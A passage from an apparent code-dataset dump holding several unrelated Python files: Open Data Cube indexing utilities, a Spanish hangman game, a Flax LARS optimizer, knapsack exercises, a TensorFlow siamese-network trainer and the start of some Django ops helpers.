click.option(\n \"--absolute\",\n is_flag=True,\n default=False,\n help=\"Use absolute paths from the STAC document.\",\n)\n\nupdate_flag = click.option(\n \"--update\",\n is_flag=True,\n default=False,\n help=\"If set, update instead of add datasets.\",\n)\n\nupdate_if_exists_flag = click.option(\n \"--update-if-exists\",\n is_flag=True,\n default=False,\n help=\"If the dataset or product already exists, update it instead of skipping it.\",\n)\n\nallow_unsafe = click.option(\n \"--allow-unsafe\",\n is_flag=True,\n default=False,\n help=\"Allow unsafe changes to a dataset. Take care!\",\n)\n\nskip_check = click.option(\n \"--skip-check\",\n is_flag=True,\n default=False,\n help=\"Assume file exists when listing exact file rather than wildcard.\",\n)\n\nno_sign_request = click.option(\n \"--no-sign-request\",\n is_flag=True,\n default=False,\n help=\"Do not sign AWS S3 requests.\",\n)\n\nrequest_payer = click.option(\n \"--request-payer\",\n is_flag=True,\n default=False,\n help=\"Needed when accessing requester pays public buckets.\",\n)\n\narchive_less_mature = click.option(\n \"--archive-less-mature\",\n is_flag=True,\n default=False,\n help=(\n \"Archive existing any datasets that match product, \"\n \"time and region-code, but have lower dataset-maturity.\"\n \"Note: An error will be raised and the dataset add will \"\n \"fail if a matching dataset with higher or equal dataset-maturity.\"\n ),\n)\n\npublish_action = click.option(\n \"--publish-action\",\n type=str,\n default=None,\n nargs=1,\n help=\"SNS topic arn to publish indexing/archiving actions to.\",\n)\n\narchive = click.option(\n \"--archive\",\n is_flag=True,\n default=False,\n help=\"Archive datasets instead of adding them.\",\n)\n\nlimit = click.option(\n \"--limit\",\n default=None,\n type=int,\n help=\"Stop indexing after n datasets have been indexed.\",\n)\n\nbbox = click.option(\n \"--bbox\",\n type=str,\n default=None,\n help=\"Comma separated list of bounding box coords, lon-min, lat-min, lon-max, lat-max\",\n)\n\nstatsd_setting = click.option(\n \"--statsd-setting\",\n is_flag=False,\n default=None,\n help=\"statsd exporter hostname and port, i.e. prometheus-statsd-exporter:9125\",\n)\n\n\ndef get_esri_list():\n stream = importlib_resources.files(__name__).joinpath(\"esri-lc-tiles-list.txt\")\n with stream as f:\n for tile in f.readlines():\n tile_id = tile.decode().rstrip(\"\\n\")\n yield ESRI_LANDCOVER_BASE_URI.format(id=tile_id)\n\n\ndef index_update_dataset(\n metadata: dict,\n uri: str,\n dc: Datacube,\n doc2ds: Doc2Dataset,\n update: bool = False,\n update_if_exists: bool = False,\n allow_unsafe: bool = False,\n archive_less_mature: Optional[Union[bool, Iterable[str]]] = None,\n publish_action: Optional[str] = None,\n stac_doc: Optional[dict] = None,\n) -> int:\n \"\"\"\n Index and/or update a dataset. Called by all the **_to_dc CLI tools.\n\n :param metadata: A dataset metadata dictionary, read from yaml or json, converted from STAC, etc.\n :param uri: The URI of the metadata and associated data.\n :param dc: A datacube object (carries a database index and potentially an active transaction).\n :param doc2ds: A Doc2Dataset object (metadata_type and product resolver)\n :param update: If true, allow update only.\n :param update_if_exists: If true allow insert or update.\n :param allow_unsafe: Allow unsafe (arbitrary) dataset updates.\n :param archive_less_mature: Enforce dataset maturity.\n * If None (the default) or False or an empty iterable, ignore dataset maturity.\n * If True, enforce dataset maturity by looking for existing datasets with same product, region_code and time\n values. If a less mature match is found, it is archived and replaced with the new dataset being inserted.\n If a match of the same or greater maturity is found a SkippedException is raised.\n * If an iterable of valid search field names is provided, it is used as the \"grouping\" fields for\n identifying dataset maturity matches.\n (i.e. `archive_less_mature=True` is the same as `archive_less_mature=['region_code', 'time'])\n :param publish_action: SNS topic arn to publish action to.\n :param stac_doc: STAC document for publication to SNS topic.\n :return: Returns nothing. Raises an exception if anything goes wrong.\n \"\"\"\n if uri is None:\n raise IndexingException(\"Failed to get URI from metadata doc\")\n # Make sure we can create a dataset first\n try:\n ds, err = doc2ds(metadata, uri)\n except ValueError as e:\n raise IndexingException(\n f\"Exception thrown when trying to create dataset: '{e}'\\n The URI was {uri}\"\n ) from e\n if ds is None:\n raise IndexingException(\n f\"Failed to create dataset with error {err}\\n The URI was {uri}\"\n )\n\n with dc.index.transaction():\n # Process in a transaction\n archive_stacs = []\n added = False\n updated = False\n if archive_less_mature and publish_action:\n dupes = dc.index.datasets.find_less_mature(ds, 500)\n for dupe in dupes:\n archive_stacs.append(ds_to_stac(dupe))\n\n # Now do something with the dataset\n # Note that any of the exceptions raised below will rollback any archiving performed above.\n if dc.index.datasets.has(metadata.get(\"id\")):\n # Update\n if update or update_if_exists:\n # Set up update fields\n updates = {}\n if allow_unsafe:\n updates = {tuple(): changes.allow_any}\n # Do the updating\n try:\n dc.index.datasets.update(\n ds,\n updates_allowed=updates,\n archive_less_mature=archive_less_mature,\n )\n updated = True\n except ValueError as e:\n raise IndexingException(\n f\"Updating the dataset raised an exception: {e}\"\n )\n else:\n logging.warning(\"Dataset already exists, not indexing\")\n raise SkippedException(\n f\"Dataset {metadata.get('id')} already exists, not indexing\"\n )\n else:\n if update:\n # We're expecting to update a dataset, but it doesn't exist\n raise IndexingException(\n \"Can't update dataset because it doesn't exist.\"\n )\n # Everything is working as expected, add the dataset\n dc.index.datasets.add(ds, archive_less_mature=archive_less_mature)\n added = True\n\n if publish_action:\n for arch_stac in archive_stacs:\n publish_to_topic(arn=publish_action, action=\"ARCHIVED\", stac=arch_stac)\n\n if added:\n logging.info(\"New Dataset Added: %s\", ds.id)\n if publish_action:\n # if STAC was not provided, generate from dataset\n stac_doc = stac_doc if stac_doc else ds_to_stac(ds)\n publish_to_topic(arn=publish_action, action=\"ADDED\", stac=stac_doc)\n\n if updated:\n logging.info(\"Existing Dataset Updated: %s\", ds.id)\n\n\ndef statsd_gauge_reporting(value, tags=None, statsd_setting=\"localhost:8125\"):\n if tags is None:\n tags = []\n host = statsd_setting.split(\":\")[0]\n port = statsd_setting.split(\":\")[1]\n options = {\"statsd_host\": host, \"statsd_port\": port}\n initialize(**options)\n\n statsd.gauge(\"datacube_index\", value, tags=tags)\n","sub_path":"apps/dc_tools/odc/apps/dc_tools/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":9360,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"195376814","text":"import random\nimport os\nimport sys\nimport time\n\npalabras = ['ASCENSOR', 'BELLOTA', 'CAFETERA', 'CHANCHO', 'DELIRIO',\n 'ELEFANTE', 'FLAUTA', 'GIGANTESCO', 'HERMOSO', 'INDEPENDENCIA',\n 'JEFATURA', 'KILOGRAMO', 'LEJANO', 'LLANURA', 'MATRIMONIO',\n 'NORTE', 'ORQUESTA', 'POLICIA', 'QUESADILLA',\n 'RETIRO', 'SOLEADO', 'TERMOMETRO', 'UMBRAL', 'VENTANA',\n 'WHATSAPP', 'XILOFONO', 'YARDA', 'ZORRO']\n\n# la funcion list convierte la palabra elejida por\n# el modulo random en una lista iterable\n\n\ndef obtener_palabra_aleatoria():\n palabra = list(random.choice(palabras))\n return palabra\n\n\nfigura = ['''\n +---+\n | \n | \n |\n ===\n VIDAS = 6''', '''\n +---+\n O | \n |\n |\n ===\n VIDAS = 5''', '''\n +---+\n O |\n | |\n |\n ===\n VIDAS = 4''', '''\n +---+\n O | \n /| | \n |\n ===\n VIDAS = 3''', '''\n +---+\n O | \n /|\\ | \n |\n ===\n VIDAS = 2''', '''\n +---+\n O | \n /|\\ | \n / |\n ===\n VIDAS = 1''', '''\n +---+\n O | \n /|\\ | \n / \\ |\n ===\n AHORCADO''']\n\ntodas_las_letras = [] # lista para almacenar letras dichas\nfallos = 0 # contador de fallos\nresultado = [] # lista con _ para sustituir por letras adivinadas\n\n\ndef clear(): # funcion para limpiar consola dependiendo del sistema operativo\n if sys.platform.startswith('win'):\n os.system('cls')\n elif sys.platform.startswith('darwin'):\n os.system('clear')\n elif sys.platform.startswith('linux'):\n os.system('clear')\n\n\n# agrgara _ segunlargo de la palabra escogida\npalabra = obtener_palabra_aleatoria()\nfor a in range(len(palabra)):\n resultado.append('_')\n\n\nwhile True:\n clear()\n print('************ JUEGO DEL AHORCADO ***********')\n print('*******************************************')\n print(figura[fallos])\n print()\n print(' ', end='')\n for c in resultado:\n print(c, end='')\n print()\n print()\n if resultado == palabra:\n print('*************** HAS GANADO ***************')\n break\n if fallos >= 6:\n print('La palabra era:', ''.join(palabra))\n print('************** HAS PERDIDO ***************')\n break\n while True:\n letra_sin_formato = input('Ingresa una letra: ')\n letra_usuario = letra_sin_formato.upper()\n if len(letra_usuario) != 1:\n print('Introduce una letra')\n elif letra_usuario in todas_las_letras:\n print('Ya ingreso esa letra')\n elif letra_usuario not in 'ABCDEFGHIJKLMNOPQRSTUVWXYZ':\n print('Introduce una letra')\n else:\n todas_las_letras.append(letra_usuario)\n break\n for d in range(len(palabra)):\n if palabra[d] == letra_usuario:\n resultado[d] = letra_usuario\n if letra_usuario not in palabra:\n fallos += 1\n print()\n print()\n","sub_path":"M2_S6_grupal/grupal_2_6.py","file_name":"grupal_2_6.py","file_ext":"py","file_size_in_byte":3540,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"560357257","text":"# Copyright 2021 The Flax Authors.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\nfrom .. import struct\n\nimport jax.numpy as jnp\n\nimport numpy as np\n\nfrom .base import OptimizerDef\n\n\n@struct.dataclass\nclass _LARSHyperParams:\n learning_rate: np.ndarray\n beta: np.ndarray\n weight_decay: np.ndarray\n trust_coefficient: np.ndarray\n eps: np.ndarray\n nesterov: bool\n\n\n@struct.dataclass\nclass _LARSParamState:\n momentum: np.ndarray\n\n\nclass LARS(OptimizerDef):\n \"\"\"Layerwise adaptive rate scaling (LARS) optimizer.\n\n See https://arxiv.org/abs/1708.03888\n \"\"\"\n\n def __init__(self, learning_rate=None, beta=0.9, weight_decay=0,\n trust_coefficient=0.001, eps=0, nesterov=False):\n \"\"\"Constructor for the LARS optimizer.\n\n Args:\n learning_rate: the step size used to update the parameters.\n beta: the coefficient used for the moving average of the\n gradient (default: 0.9).\n weight_decay: weight decay coefficient to apply\n trust_coefficient: coefficient for trust ratio computation\n (default: 0.001).\n eps: epsilon used for trust ratio computation (default: no epsilon).\n nesterov: whether to use Nesterov momentum (default: False).\n \"\"\"\n\n hyper_params = _LARSHyperParams(\n learning_rate, beta, weight_decay, trust_coefficient, eps, nesterov)\n super().__init__(hyper_params)\n\n def init_param_state(self, param):\n return _LARSParamState(jnp.zeros_like(param))\n\n def apply_param_gradient(self, step, hyper_params, param, state, grad):\n del step\n assert hyper_params.learning_rate is not None, 'no learning rate provided.'\n\n param_norm = jnp.linalg.norm(param)\n grad_norm = jnp.linalg.norm(grad)\n trust_ratio = hyper_params.trust_coefficient * param_norm / (\n grad_norm + hyper_params.weight_decay * param_norm + hyper_params.eps)\n clipped_trust_ratio = jnp.where(\n jnp.logical_or(grad_norm == 0., param_norm == 0.), 1., trust_ratio)\n scaled_lr = hyper_params.learning_rate * clipped_trust_ratio\n if hyper_params.weight_decay != 0:\n grad += hyper_params.weight_decay * param\n\n scaled_grad = scaled_lr * grad\n momentum = state.momentum\n new_momentum = hyper_params.beta * momentum + scaled_grad\n if hyper_params.nesterov:\n d_p = scaled_grad + hyper_params.beta * new_momentum\n else:\n d_p = new_momentum\n new_param = param - d_p\n new_state = _LARSParamState(new_momentum)\n return new_param, new_state\n","sub_path":"flax/optim/lars.py","file_name":"lars.py","file_ext":"py","file_size_in_byte":2957,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"220358084","text":"#!/usr/bin/python3\nimport sys\nimport time\nimport pprint as pp\n\ndef knap_sack_recursive(val, bag_strength):\n if bag_strength <= 0: return 0\n\n max_val = 0\n for k in val:\n if k <= bag_strength:\n copy=val.copy()\n copy.pop(k)\n max_val = max(max_val, val[k] + knap_sack_recursive(copy, bag_strength-k))\n\n return(max_val)\n\ndef knap_sack(w, T):\n k=sorted(w.keys())\n# pp.pprint(w)\n\n M=[[0 for _ in range(T+1)] for _ in k]\n\n for i in range(len(k)):\n for j in range(T+1):\n if i == 0:\n if j == 0:\n M[i][j] = 0\n else:\n M[i][j] = w[k[i]] if k[i] <= j else 0\n else:\n consider = w[k[i]] + M[i-1][j-k[i]] if k[i] <= j else 0\n donotconsider = M[i-1][j]\n M[i][j] = max(consider, donotconsider)\n\n# pp.pprint(M)\n return(M[-1][-1])\n\ndef getWays_knap_sack_dp_bottom_up(val, bag_strength):\n wt=[0] + list(val.keys())\n wt.sort()\n destination = bag_strength\n\n # Create the matrix/storage \n M = [[0 for _ in range(destination+1)] for _ in range(len(wt))]\n\n # Base 1 - when wt is 1(only 1) # then all sow will val[1] if same_allowed else i*val[1]\n for i in range(1,destination+1):\n if wt[1] > i: # If wt of 1st element is more than present sow\n M[1][i] = 0\n elif same_allowed:\n M[1][i] = val[wt[1]]*i\n else:\n M[1][i] = val[wt[1]]\n \n # Base 2 - when sow is 0 # No wt can be used.\n for i in range(1,len(wt)): M[i][0] = 0 # Already covered above.\n\n for row in range(2,len(wt)):\n for col in range(1,destination+1):\n # if row==0 and col==0:\n # M[row][col] = 0\n # else:\n val_by_excl = M[row-1][col] if row-1 > 0 else 0\n if wt[row] > col:\n val_by_incl = 0\n else:\n value_of_sow_for_remaining = M[row][col-wt[row]] if same_allowed else M[row-1][col-wt[row]]\n val_by_incl = val[wt[row]] + value_of_sow_for_remaining\n #val_by_incl = val[wt[row]] + M[row-1][col-wt[row]] if wt[row] <= col else 0\n M[row][col] = max(val_by_incl, val_by_excl)\n #print(row,col,wt[row],val[wt[row]],M[row][col],val_by_excl,val_by_incl)\n\n pp.pprint(M)\n# elements = set()\n# previous=len(wt)-1\n# for present in range(1,len(wt)-2):\n# print(previous, present)\n# if previous:\n# if M[previous][-1] == M[present][-1]:\n# previous=present\n# continue\n# else:\n# elements.add(present)\n# previous=None\n# else:\n# previous=present\n# print(elements)\n return(M[-1][-1])\n\n\"\"\"\nTest Case 1:\n-------------\nInput => {1: 1, 2: 4, 3: 4, 4: 5, 5: 7} \n 9\nResult => 13\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 1, 1, 1, 1, 1, 1, 1],\n [0, 1, 4, 5, 5, 5, 5, 5, 5, 5],\n [0, 1, 4, 5, 5, 8, 9, 9, 9, 9],\n [0, 1, 4, 5, 5, 8, 9, 10, 10, 13],\n [0, 1, 4, 5, 5, 8, 9, 11, 12, 13]]\n\"\"\"\nkey_val = {1:1, 2:4, 3:4, 4:5, 5:7}\nn = 9\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 2:\n-------------\nInput => {1: 1, 3: 4, 4: 5, 5: 7} \n 7\nResult => 9\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0, 0, 0],\n [0, 1, 1, 1, 1, 1, 1, 1],\n [0, 1, 1, 4, 5, 5, 5, 5],\n [0, 1, 1, 4, 5, 6, 6, 9],\n [0, 1, 1, 4, 5, 7, 8, 9]]\n\"\"\"\nkey_val = {1: 1, 3: 4, 4: 5, 5: 7}\nn = 7\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 3:\n-------------\nInput => {2: 3, 3: 7, 4: 2, 5: 9} \n 5\nResult => 10\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 3, 3, 3, 3, 3],\n [0, 3, 3, 7, 10, 10],\n [0, 3, 3, 7, 10, 10],\n [0, 3, 3, 7, 10, 10]]\n\"\"\"\nkey_val = {2: 3, 3: 7, 4: 2, 5: 9}\nn = 5\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 4:\n-------------\nInput => {1: 5, 2: 3, 4: 5, 5: 2} \n 5\nResult => 10\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 5, 5, 5, 5, 5],\n [0, 5, 5, 8, 8, 8],\n [0, 5, 5, 8, 8, 10],\n [0, 5, 5, 8, 8, 10]]\n\"\"\"\nkey_val = {1: 5, 2: 3, 4: 5, 5: 2}\nn = 5\nsame_allowed = False\n\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n\n\"\"\"\nTest Case 5:\n-------------\nInput => {2: 3, 3: 4, 4: 5, 5: 6} \n 5\nResult => 7\nMatrix At end =>\n[[0, 0, 0, 0, 0, 0],\n [0, 0, 3, 3, 3, 3],\n [0, 0, 3, 4, 4, 7],\n [0, 0, 3, 4, 5, 7],\n [0, 0, 3, 4, 5, 7]]\n\"\"\"\nkey_val = {2: 3, 3: 4, 4: 5, 5: 6}\nn = 5\nsame_allowed = False\nprint(key_val, n)\nprint(getWays_knap_sack_dp_bottom_up(key_val,n))\nprint(knap_sack(key_val,n))\nprint(knap_sack_recursive(key_val,n))\n","sub_path":"python3/dynamicprogramming/2.knapsack.problem.1.0.py","file_name":"2.knapsack.problem.1.0.py","file_ext":"py","file_size_in_byte":4808,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"429397170","text":"import os\r\nimport tensorflow as tf\r\nimport Dataset\r\n\r\n#Change Log\r\n#N/A\r\n\r\nScript_tag = 'Siamesev1.0.py'\r\n\r\n#Load and Save Functions\r\nSave_load = False\r\nSave_save = False\r\nSave_name = 'Version1.0'\r\nSave_dir = 'C:\\\\Users\\\\Imam\\\\Documents\\\\PROGRAMMING PROJECTS\\\\LaunchX'\r\nSave_location = Save_dir+Script_tag+Save_name\r\nif not os.path.exists(Save_dir):\r\n os.makedirs(Save_dir)\r\n\r\n#Open Data Set\r\ntrainingData = Dataset.dataAssembler(0,10)\r\ntestData = Dataset.dataAssembler(10,90)\r\n\r\n#Training step count varible\r\ntraining_steps = 1\r\n\r\n#Batch Size\r\nbatch_size = 256\r\n\r\n#Epoch Ammount\r\nepoch_amm =30\r\n\r\n#Input Data Params\r\ndata_dimension = [None, 784]\r\n\r\n#I/O Placeholders \r\nx1 = tf.placeholder(tf.float32, data_dimension)\r\nx2 = tf.placeholder(tf.float32, data_dimension)\r\ny = tf.placeholder(tf.float32)\r\n\r\n#Learning Rate For Network\r\nflat_rate = False\r\nbase_Rate = .001\r\ndecay_steps = 64\r\ndecay_rate = .97\r\nStaircase = True\r\n\r\n#Learning Rate Definition\r\nif False==flat_rate:\r\n Learning_Rate = tf.train.exponential_decay(base_Rate, training_steps, decay_steps, decay_rate, staircase='Staircase', name='Exp_decay' )\r\nelse:\r\n Learning_Rate = base_Rate\r\n\r\n#Convolution Function returns neuronns that act on a section of prev. layer\r\ndef conv2d(x,W):\r\n return tf.nn.conv2d(x,W,strides=[1,1,1,1],padding='SAME')\r\n\r\n#Pooling function returns max value in 2 by 2 sections \r\ndef maxpool2d(x):\r\n return tf.nn.max_pool(x,ksize=[1,2,2,1],strides=[1,2,2,1],padding='SAME')\r\n\r\n#RELU (rectified linear unit)\r\ndef relu(x):\r\n return tf.nn.relu(x,'relu')\r\n\r\n#Matrix broadcasting addition \r\ndef add(x, b):\r\n return tf.add(x,b)\r\n\r\n#Weight initializer \r\ndef weight_def(shape):\r\n initial = tf.truncated_normal(shape, stddev=0.1)\r\n return tf.Variable(initial)\r\n\r\n#Bias intializer \r\ndef bias_def(shape):\r\n initial = tf.constant(0.1, shape=shape)\r\n return tf.Variable(initial)\r\n\r\n\r\n#'Main' method, contains the Neural Network \r\ndef convolutional_neural_network(x1, x2):\r\n weights = {'W_fc':weight_def([784,512]),\r\n 'W_fc2':weight_def([1024,1024]),\r\n 'W_out':weight_def([1024,2]),}\r\n \r\n biases = {'B_fc':bias_def([512]),\r\n 'B_fc2':bias_def([1024]),\r\n 'B_out':bias_def([2])}\r\n \r\n #Siamese 1\r\n fc1 = tf.matmul(x1,weights['W_fc'])\r\n fc1 = add(fc1,biases['B_fc'])\r\n fc1 = relu(fc1)\r\n\r\n #siamese 2\r\n fc2 = tf.matmul(x2,weights['W_fc'])\r\n fc2 = add(fc2,biases['B_fc'])\r\n fc2 = relu(fc2)\r\n \r\n #Conector Op\r\n fc = tf.concat([fc1, fc2], 1)\r\n\r\n #Fc Layer\r\n fc = tf.matmul(fc,weights['W_fc2'])\r\n fc = add(fc,biases['B_fc2'])\r\n fc = relu(fc)\r\n\r\n #final layer\r\n output = tf.matmul(fc,weights['W_out'])\r\n output = add(output,biases['B_out'])\r\n \r\n return output\r\n\r\n#Trains The neural Network\r\ndef train_neural_network(x1,x2):\r\n\r\n training_steps = 0\r\n #Initiate The Network\r\n prediction = convolutional_neural_network(x1, x2)\r\n \r\n #Define the Cost and Cost function\r\n #tf.reduce_mean averages the values of a tensor into one value\r\n cost = tf.reduce_mean( tf.nn.softmax_cross_entropy_with_logits(labels=y,logits=prediction) )\r\n\r\n #Optimizer + Learning_Rate passthrough\r\n optimizer = tf.train.AdamOptimizer(Learning_Rate).minimize(cost)\r\n \r\n #Get Epoch Ammount \r\n hm_epochs = epoch_amm\r\n \r\n #Save_saver = tf.train.Saver({'W_conv1':weights[W_conv1] ,'W_conv2':weights[W_conv2] ,'W_fc':weights[W_fc] ,'W_out':weights[W_out] ,'B_conv1':biases[B_conv1] ,'B_conv2':biases[B_conv2] ,'B_fc':biases[B_fc] ,'B_out':biases[B_out]})\r\n Save_saver = tf.train.Saver()\r\n \r\n #Starts C++ Training session\r\n print('Session Started, ', Script_tag)\r\n with tf.Session() as sess:\r\n \r\n #Initiate and Load all Variables\r\n sess.run(tf.global_variables_initializer())\r\n if Save_load: \r\n Save_saver.restore(sess , Save_location)\r\n \r\n #Begin Logs\r\n summary_writer = tf.summary.FileWriter('/tmp/logs',sess.graph)\r\n \r\n #Start Training\r\n for epoch in range(hm_epochs):\r\n \r\n #Holds Data for loss and accuracy functions\r\n epoch_loss = 0\r\n acc_total = 0\r\n for count in range(int(trainingData.num_examples/batch_size)):\r\n \r\n #Training code\r\n training_steps = (training_steps+1)\r\n epoch_x1, epoch_x2, epoch_y = trainingData.generateSiameseBatch(batch_size)\r\n count, c = sess.run([optimizer, cost], feed_dict={x1: epoch_x1, x2: epoch_x2, y: epoch_y})\r\n epoch_loss += c\r\n \r\n #Find Accuracy While Training\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n \r\n print('Epoch', epoch, 'current epoch loss', epoch_loss, 'batch loss', c,'ts',training_steps,' ', end='\\r')\r\n #Log the loss per epoch\r\n print('Epoch', epoch, 'completed out of',hm_epochs,'loss:',epoch_loss,' ','batch loss', c,'ts',training_steps,' ' )\r\n \r\n ''' acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(trainingData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = trainingData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Train Accuracy:',acc_total*batch_size/float(trainingData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current train set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n \r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(testData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = testData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Test Accuracy:',acc_total*batch_size/float(testData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current test set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n '''\r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(trainingData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = trainingData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Train Accuracy:',acc_total*batch_size/float(trainingData.num_examples),end='\\r')\r\n print('Epoch', epoch, 'current train set accuracy : ',acc_total*batch_size/float(trainingData.num_examples))\r\n \r\n acc_total = 0\r\n correct = tf.equal(tf.argmax(prediction, 1), tf.argmax(y, 1))\r\n accuracy = tf.reduce_mean(tf.cast(correct, 'float'))\r\n for _ in range(int(testData.num_examples/batch_size)):\r\n test_x1, test_x2, test_y = testData.generateSiameseBatch(batch_size)\r\n acc = accuracy.eval(feed_dict={x1: test_x1,x2: test_x2, y: test_y})\r\n acc_total += acc\r\n print('Test Accuracy:',acc_total*batch_size/float(testData.num_examples),end='\\r') \r\n print('Epoch', epoch, 'current test set accuracy : ',acc_total*batch_size/float(testData.num_examples))\r\n\r\n print('Batch - ', batch_size)\r\n print('Epochs - ', epoch_amm)\r\n print('Learning Rate:')\r\n print('flat rate', flat_rate )\r\n print('Base Rate',base_Rate)\r\n print('Decay Steps',decay_steps)\r\n print('Decay Rate',decay_rate)\r\n print('staircase',Staircase)\r\n if Save_save:\r\n Save_path = Save_saver.save(sess , Save_location)\r\n print(\"Model saved in file: %s\" % Save_path)\r\n\r\n sess.close()\r\ntrain_neural_network(x1,x2)","sub_path":"Misc Stuff/Model.py","file_name":"Model.py","file_ext":"py","file_size_in_byte":8322,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"650883375","text":"# -*- coding: utf-8 -*-\n__author__ = 'shijin'\n\nimport sys\nimport inspect\nfrom django.contrib.auth.models import User, Group\nfrom django.db.models import Q\nimport re\nimport socket\nimport json\nfrom urllib import request, error\n\nimport logging\nlogger = logging.getLogger('django.ops')\n\nclass DoPostError(Exception): pass\nclass DoGetError(Exception): pass\n\n\ndef get_current_function_name():\n # print(sys._getframe().f_code.co_name) #返回 get_current_function_name 函数名\n # print(inspect.stack()[0][3]) #返回 自身的函数信息\n return inspect.stack()[1][3] # 返回 调用的上一级方法或函数信息\n\n\ndef get_class_name(class_obj): # 返回传入的对象实例 的类型名称\n if isinstance(class_obj, (object,)):\n return class_obj.__class__.__name__\n\n\ndef isdigit(number):\n try:\n number = int(number)\n return isinstance(number, int)\n except Exception:\n return False\n\n\ndef search_username(fullname):\n \"\"\" search User for first_name and last_name user\"\"\"\n _fullname = ''.join(str(fullname).split())\n users = User.objects.all()\n try:\n user_qs = users.filter(username=_fullname)\n if user_qs: return user_qs\n\n if len(_fullname) == 2:\n user_qs = users.filter(last_name=_fullname[0], first_name=_fullname[1])\n if user_qs:\n return user_qs\n else:\n return None\n elif len(_fullname) > 2:\n q = Q(last_name=_fullname[0:1], first_name=_fullname[1:]) | Q(last_name=_fullname[0:2],\n first_name=_fullname[2:])\n user_qs = users.filter(q)\n if user_qs:\n return user_qs\n else:\n return None\n except Exception as e:\n logger.error(\"{f} search {n} error: {e}\".format(f=\"search_username\", n=str(fullname), e=repr(e)))\n print(repr(e))\n return None\n\n\ndef get_port(ports, return_type='str'):\n \"\"\" check ports and return str or list\"\"\"\n port_list = list()\n try:\n if ports and isinstance(ports, str):\n # port_list = ports.split(',')\n port_list = re.split(',|,|、', ports)\n elif ports and isinstance(ports, list):\n pass\n else:\n raise ValueError(\"变量端口数据类型不合法!\")\n\n if port_list:\n port_list = list(set(list(filter(None, port_list))))\n _port_list = list(filter(isdigit, port_list))\n if len(port_list) == len(_port_list):\n if return_type == 'str':\n return ','.join(_port_list)\n else:\n return _port_list\n else:\n raise ValueError(\"变量端口中包含非法字符!\")\n else:\n raise ValueError(\"变量端口为空值!\")\n except ValueError:\n raise\n except Exception:\n raise Exception(\"get ports errors!\")\n\n\ndef get_hostname():\n \"\"\" :return hostname \"\"\"\n try:\n return socket.gethostname()\n except:\n return None\n\n\ndef get_host_ip(connect_ip, connect_port):\n \"\"\" :param connect_ip connect remote host ip\n connect_port connect remote host port\n :return ip or None\n \"\"\"\n s = None\n ip = None\n try:\n s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)\n s.connect((connect_ip, connect_port))\n ip = s.getsockname()[0]\n finally:\n if s is not None:\n s.close()\n return ip\n\n\ndef _do_post(url, **kwargs):\n \"\"\"\n request post method\n \"\"\"\n\n kwargs = kwargs if kwargs else {}\n data = bytes(json.dumps(kwargs), encoding='utf-8')\n req = request.Request(url=url, data=data, method=\"POST\")\n\n for i in range(3):\n _timeout = 3 * i + 3\n try:\n res = request.urlopen(req, timeout=_timeout)\n if res:\n # print('##'*30)\n # print('res:', res)\n # print('**' * 30)\n # print('res.read(): ', str(res.read(), encoding='utf-8'))\n # print('##' * 30)\n return json.loads(str(res.read(), encoding='utf-8'))\n else:\n continue\n except error.HTTPError as e:\n logger.error(\"post request failed, url: {u}, code: 